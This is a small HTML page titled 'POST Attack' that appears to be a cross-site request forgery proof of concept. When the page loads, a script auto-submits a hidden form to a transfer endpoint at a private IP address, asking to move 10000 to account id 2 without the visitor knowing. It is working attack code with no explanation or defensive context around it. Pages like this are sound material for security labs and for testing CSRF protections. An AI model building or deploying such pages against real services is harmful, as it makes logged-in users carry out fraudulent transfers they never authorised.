<!DOCTYPE html>
<html>
<head>
<title>POST Attack</title>
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js"></script>
<script type="text/javascript">
$(function() {
    $("#transferform").submit();
});
</script>
</head>
<body>
<form id="transferform" action="http://10.1.128.142:5000/transfer" method=post>
    <input type="text" name="id" value="2">
    <input type="text" name="amount" value="10000">
    <input type="submit" value="Transfer">
</form>
</body>
</html>
